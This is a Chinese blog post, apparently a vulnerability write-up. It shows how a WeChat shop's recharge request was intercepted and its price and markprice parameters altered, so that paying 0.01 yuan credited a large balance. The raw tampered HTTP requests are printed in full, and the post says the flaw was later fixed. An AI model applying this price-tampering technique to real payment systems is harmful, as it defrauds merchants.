首先进入个人页面
点击充值进入充值页面
然后点击充值按钮,拦截请求地址得到
GET /WxpayAPI/weixinpay/js_api_calltmy.php?order_no=125876581523781&price=100&shop_id=1483&spmc=%D3%E0%B6%EE%B3%E4%D6%B5&markprice=100 HTTP/1.1 Host: wx.***.com Cookie: PHPSESSID=a75ba6a56fe46584722754fdadbb7e61; name_id=a75ba6a56fe46584722754fdadbb7e61; PHPSESSID=a75ba6a56fe46584722754fdadbb7e61 Connection: close Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Mobile/14A403 MicroMessenger/6.3.25 NetType/WIFI Language/zh_CN Referer: http://wx.***.com/ShopIndex.php/User/Indexnew/usable_money/shop_id/1483?&login_member_id=14345 Accept-Language: zh-cn Accept-Encoding: gzip, deflate修改参数 price 和 markprice,修改后的请求为
GET /WxpayAPI/weixinpay/js_api_calltmy.php?order_no=125876581523781&price=0.01&shop_id=1483&spmc=%D3%E0%B6%EE%B3%E4%D6%B5&markprice=100000 HTTP/1.1 Host: wx.***.com Cookie: PHPSESSID=a75ba6a56fe46584722754fdadbb7e61; name_id=a75ba6a56fe46584722754fdadbb7e61; PHPSESSID=a75ba6a56fe46584722754fdadbb7e61 Connection: close Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Mobile/14A403 MicroMessenger/6.3.25 NetType/WIFI Language/zh_CN Referer: http://wx.***.com/ShopIndex.php/User/Indexnew/usable_money/shop_id/1483?&login_member_id=14345 Accept-Language: zh-cn Accept-Encoding: gzip, deflate然后放行,进入微信支付,显示支付0.01元
输入密码后就充值成功了
分分钟变土豪!
更新
听说程序猿哥哥已经修复了漏洞,还是挺积极的。
本文链接:https://www.92ez.com/?action=show&id=23392
!!! 转载请先联系non3gov@gmail.com授权并在显著位置注明作者和原文链接 !!! 小黑屋
提示:技术文章有一定的时效性,请先确认是否适用你当前的系统环境。
!!! 转载请先联系non3gov@gmail.com授权并在显著位置注明作者和原文链接 !!! 小黑屋
提示:技术文章有一定的时效性,请先确认是否适用你当前的系统环境。
